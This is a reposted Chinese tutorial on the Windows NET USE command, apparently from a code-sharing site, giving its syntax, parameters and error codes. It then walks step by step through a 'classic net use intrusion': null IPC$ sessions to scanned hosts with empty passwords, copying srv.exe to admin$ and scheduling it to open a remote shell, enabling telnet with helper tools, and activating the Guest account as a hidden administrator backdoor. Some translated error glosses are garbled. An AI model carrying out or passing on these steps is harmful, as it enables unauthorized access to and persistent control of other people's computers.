WinCMD NET USE 命令


WinCMD  NET USE 命令

功能描述:用於將計算機與共享的資源相連接(建立磁盤映射),或者切斷計算機與共享資源的連接(刪除磁盤映射),當不帶選項使用本命令時,它會列出計算機的連接。

1、命令語法:

NET USE
[devicename | *] [\\computername\sharename[\volume] [password | *]]
        [/USER:[domainname\]username]
        [/USER:[dotted domain name\]username]
        [/USER:[username@dotted domain name]
        [/SMARTCARD]
        [/SAVECRED]
        [/REQUIREINTEGRITY]
        [/REQUIREPRIVACY]
        [/WRITETHROUGH]
        [[/DELETE] | [/PERSISTENT:{YES | NO}]]

NET USE {devicename | *} [password | *] /HOME

NET USE [/PERSISTENT:{YES | NO}]

2、參數說明

  • devicename   //指定一個名字以便與資源相連接,或者指定要切斷的設備。\\computername   //指控制共享資源的計算機的名字。如果計算機名中包含有空字符,就要將雙反斜線 (\\) 和計算機名一起用引號(" ")括起來。計算機名可以有1 到 15 個 字符。
    • 有兩種類型的設備名:磁盤驅動器 (D: 至 Z:) 和打印機
    • (LPT1: 至 LPT3:)。輸入 一個星號來代替一個指定的設備名可以分配下一個可用設備名。
  • \sharename   //指共享資源的網絡名字。
  • \volume   //指定一個服務器上的 NetWare 卷。用戶必須安裝 Netware的客戶服務(Windows 工作站) 或者 Netware 的網關服務(Windows 服務器) 並使之與 NetWare 服務器相連。
  • password   //指訪問共享資源所需要的密碼。* 進行密碼提示。當在密碼提示符下輸入密碼時,密碼不會顯示。
  • /USER    //指定連接時的一個不同的用戶名。
  • domainname    //指定另外一個域。如果缺省域,就會使用當前登錄的域。
  • username    //指定登錄的用戶名。
  • /SMARTCARD   //指定連接使用在智能卡上的憑據。
  • /SAVECRED    //指定保留用戶名和密碼。此開關被忽略,除非命令提示輸入用戶名和密碼。
  • /HOME    //將用戶與他們的主目錄相連。
  • /DELETE    //取消一個網絡連接,並且從永久連接列表中刪除該連接。
  • /PERSISTENT    //控制對永久網絡連接的使用。其默認值是最近使用的設置。
  • YES    //在連接產生時保存它們,並在下次登錄時恢復它們。
  • NO   //不保存正在產生的連接或后續的連接;現有的連接將在下次登錄時恢復。可以使用 /DELETE 選項開關來刪除永久連接。

列如:

net use J: \\MOVIE01\movie06$    //建立磁盤映射
net use i: \\movie\movie3$ "2009" /user:"2009"   //用用戶名登陸磁盤映射
net use i: /del    //刪除磁盤映射↓

  

3、錯誤列表:

  • System Errors  //系統錯誤種類
  • System error 5 - Access is denied   //系統錯誤5 -拒絕訪問
  • System error 5 because of firewall  //系統錯誤五,因為防火牆
  • System error 5 when using net view command in Vista   //系統錯誤5 在Vista使用net view
  • System error 8 - Not enough storage is available to process this command    //系統錯誤8 -沒有足夠的存儲是可用來處理此命令
  • System error 21 has occurred - The device is not ready.    //系統錯誤21日發生了-該裝置沒有准備好。
  • System error 51 has occurred - The remote computer is not available    //系統錯誤51已經發生-遠程計算機不可到達
  • System error 52 - You were not connected because a duplicate name exists on the network.   //系統錯誤52 -本機在網絡中重名。
  • System error 53 - The network path was not found  //系統錯誤53 -網絡路徑沒有被發現
  • System error 59 has occurred.   //系統錯誤59已經發生。 An unexpected network error occurred 意想不到的網絡發生錯誤
  • System error 64 - "The specified network name is no longer available"   //系統錯誤64 -"指定網絡名稱不再可用"
  • System error 67 - The network name cannot be found  //系統錯誤67 -網絡名稱不能找到
  • System Error 71 - The network request was not accepted    //系統錯誤71 -網絡的要求不被接受
  • system error 71 has occurred - Post  //系統錯誤71已經發生-送出
  • System error 85 has occurred. The local device name is already in use  //系統錯誤85已經發生。本地設備名是已在使用中
  • System error 85 has occurred - Case Study  //系統錯誤85已經發生-案例研究
  • System error 234 - More data is available
  • System Error 1130 - "Not enough server storage is available to process this command" and “Not enough memory to complete transaction. Close some applications and retry"  //系統錯誤1130 -"沒有足夠的服務器存儲,是可用來處理此命令" " 沒有足夠的內存,以完成處理。 關閉一些應用程序和再審"
  • System error 1219 has occurred - The credentials supplied conflict with an existing set of credentials  //系統錯誤1219已經發生 - 全權證書供應的沖突與現有的全權證書
  • System error 1219 - Multiple connections to a server  //系統錯誤1219 - 多重連接到一台服務器
  • System error 1231 has occurred. The network location cannot be reached.  //系統錯誤1231已經發生 - 網絡定位不能達成共識。
  • System error 1231 - There are no entries on the list  //系統錯誤123已經發生 - 沒有任何entries名單
  • System Error 1240 - The account is not authorized to login from this station.  //系統錯誤1240 - 該帳戶是沒有獲得授權登錄從這個站點。
  • System error 1311 - There are currently no logon servers available to service the logon request  //系統錯誤1311 - 沒有登入伺服器提供服務登錄請求
  • System error 1312 has occurred - - A specified logon session does not exist. It may already have been terminated.  //系統錯誤, 1312已經發生 - - 指定帳號會議是不存在的。 它可能已經被終止。
  • System Error 1314 – A required privilege is not held by the client  //系統錯誤第1314 - 要求特權,是不是舉行,由客戶端
  • System error 1326 has occurred - Logon failure: unknown user name or bad password  //系統錯誤, 1326已經發生 -登錄失敗:未知的用戶名或密碼
  • System error 1326 - Logon failure: unknown user name  //系統錯誤1326 -登錄失敗:未知的用戶名
  • System error 1326 has occurred when using net use in Vista  //系統錯誤1326發生-Vista系統中在使用網絡應用
  • System error 1331 has occurred - Logon failure: account current disable  //系統錯誤第1331發生了-登入失敗:帳戶停用
  • System error 1385 has occurred - Logon failure: the user has not been granted the requested logon type at this computer  //系統錯誤第1385發生了-登入失敗:使用者未獲批准,被請求登入類型,在這台電腦
  • System error 1396 has occurred - Logon Failure: The target account name is incorrect.  //系統錯誤, 1396已經發生 -登入失敗:目標帳戶名稱是不正確。
  • System error 6118 - The list of servers for this workgroup is not currently available  //系統錯誤6118 -名單上的服務器,這個工作還沒有可供
  • System error 1726 has occurred. The remote procedure call failed.  //系統錯誤, 1726已經發生。 遠程過程調用失敗了。

 

4、其他示例:

  • net use \\IP\ipc$ "" /user:"" (一定要注意:這一行命令中包含了3個空格)      //建立空連接:   
  • net use \\IP\ipc$ "密碼" /user:"用戶名" (同樣有3個空格)    //建立非空連接:  
  • net use z: \\IP\c$ "密碼" /user:"用戶名" (即可將對方的c盤映射為自己的z盤,其他盤類推)   //映射默認共享    //如果已經和目標建立了ipc$,則可以直接用IP+盤符+$訪問,具體命令 net use z: \\IP\c$ 
  • net use \\IP\ipc$ /del    //刪除一個ipc$連接  :
  • net use c: /del    //刪除映射的c盤,其他盤類推 
  • net use * /del    //刪除全部,會有提示要求按y確認 
  • net view \\IP      //查看遠程主機的共享資源(但看不到默認共享) 
  • net share   //查看本地主機的共享資源(可以看到本地的默認共享) 
  • nbtstat -A IP    //得到遠程主機的用戶名列表 
  • net user    //得到本地主機的用戶列表 
  • net time \\IP     //查看遠程主機的當前時間 
  • net start    //顯示本地主機當前服務
  • net start 服務名 /y     //啟動本地服務 
  • net stop 服務名 /y    //關閉本地服務 
  • net use z: \\IP\baby     //映射遠程共享,此命令將共享名為baby的共享資源映射到z盤 
  • net use c: /del     //刪除映射的c盤,其他盤類推 
  • net use * /del /y   //刪除全部   刪除共享映射 (本人測試,使用該命令后,在無任何操作的情況下 20秒 左右才能生效,原因未知  -- 2020.09.07)

1、向遠程主機復制文件 
copy \路徑\srv.exe \\IP\共享目錄名,如: 
copy ccbirds.exe \\*.*.*.*\c 即將當前目錄下的文件復制到對方c盤內 
2、遠程添加計划任務 
at \\ip 時間 程序名,如: 
at \\127.0.0.0 11:00 love.exe 
注意:時間盡量使用24小時制;在系統默認搜索路徑(比如system32/)下不用加路徑,否則必須加全路徑 
3、開啟遠程主機的telnet 
這里要用到一個小程序:opentelnet.exe,各大下載站點都有,而且還需要滿足四個要求: 

  • 1)目標開啟了ipc$共享 
  • 2)你要擁有管理員密碼和帳號 
  • 3)目標開啟RemoteRegistry服務,用戶就該ntlm認證 
  • 4)對WIN2K/XP有效,NT未經測試 

命令格式:OpenTelnet.exe \\server account psw NTLM認證方式 port 
試例如下:c:\>OpenTelnet.exe \\*.*.*.* administrator "" 1 90 

4、 激活用戶/加入管理員組 
   net uesr account /active:yes 
   net localgroup administrators account /add 

5、 關閉遠程主機的telnet 
同樣需要一個小程序:ResumeTelnet.exe 
命令格式:ResumeTelnet.exe \\server account psw 
試例如下:c:\>ResumeTelnet.exe \\*.*.*.* administrator "" 

6、 刪除一個已建立的ipc$連接 
net use \\IP\ipc$ /del 

 

5、經典 net use 入侵:

  • 1、C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators" 
    • 這是用《流光》掃到的用戶名是administrators,密碼為"空"的IP地址(空口令?哇,運氣好到家了),如果是打算攻擊的話,就可以用這樣的命令來與127.0.0.1建立一個連接,因為密碼為"空",所以第一個引號處就不用輸入,后面一個雙引號里的是用戶名,輸入administrators,命令即可成功完成。 
    • 復制之前務必用net view \\IP這個命令看一下對方的共享情況 
  • 2、C:\>copy srv.exe \\127.0.0.1\admin$ 
    • 先復制srv.exe上去,在流光的Tools目錄下就有(這里的$是指admin用戶的c:\winnt\system32\,大家還可以使用c$、d$,意思是C盤與D盤,這看你要復制到什么地方去了)。 
  • 3、 C:\>net time \\127.0.0.1 
    • 查查時間,發現127.0.0.1 的當前時間是 2002/3/19 上午 11:00,命令成功完成。 
  • 4、C:\>at \\127.0.0.1 11:05 srv.exe 
    • 用at命令啟動srv.exe吧(這里設置的時間要比主機時間快,不然你怎么啟動啊,呵呵!) 
  • 5、C:\>net time \\127.0.0.1 
    • 再查查到時間沒有?如果127.0.0.1 的當前時間是 2002/3/19 上午 11:05,那就准備開始下面的命令。 
  • 6、C:\>telnet 127.0.0.1 99 
    • 這里會用到Telnet命令吧,注意端口是99。Telnet默認的是23端口,但是我們使用的是SRV在對方計算機中為我們建立一個99端口的Shell。 
    • 雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打算建立一個Telnet服務!這就要用到ntlm了 
  • 7、C:\>copy ntlm.exe \\127.0.0.1\admin$ 
    • 用Copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的Tools目錄中)。 
  • 8、C:\WINNT\system32>ntlm 
    • 輸入ntlm啟動(這里的C:\WINNT\system32>指的是對方計算機,運行ntlm其實是讓這個程序在對方計算機上運行)。當出現"DONE"的時候,就說明已經啟動正常。然后使用"net start telnet"來開啟Telnet服務! 
  • 9、Telnet 127.0.0.1,接着輸入用戶名與密碼就進入對方了,操作就像在DOS上操作一樣簡單!(然后你想做什么?想做什么就做什么吧,哈哈) 
    • 為了以防萬一,我們再把guest激活加到管理組 
  • 10、C:\>net user guest /active:yes 
    • 將對方的Guest用戶激活 
  • 11、C:\>net user guest 1234 
    • 將Guest的密碼改為1234,或者你要設定的密碼 
  • 12、C:\>net localgroup administrators guest /add 
    • 將Guest變為Administrator^_^(如果管理員密碼更改,guest帳號沒改變的話,下次我們可以用guest再次訪問這台計算機) 

根據返回的錯誤號分析原因: 

  • 錯誤號5,拒絕訪問:很可能你使用的用戶不是管理員權限的,先提升權限; 
  • 錯誤號51,Windows無法找到網絡路徑:網絡有問題; 
  • 錯誤號53,找不到網絡路徑:ip地址錯誤;目標未開機;目標lanmanserver服務未啟動;目標有防火牆(端口過濾); 
  • 錯誤號67,找不到網絡名:你的lanmanworkstation服務未啟動或者目標刪除了ipc$; 
  • 錯誤號1219,提供的憑據與已存在的憑據集沖突:你已經和對方建立了一個ipc$,請刪除再連; 
  • 錯誤號1326,未知的用戶名或錯誤密碼:原因很明顯了; 
  • 錯誤號1792,試圖登錄,但是網絡登錄服務沒有啟動:目標NetLogon服務未啟動; 
  • 錯誤號2242,此用戶的密碼已經過期:目標有帳號策略,強制定期要求更改密碼

 

 

 

創建時間:2020.08.27  更新時間:2020.09.07

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM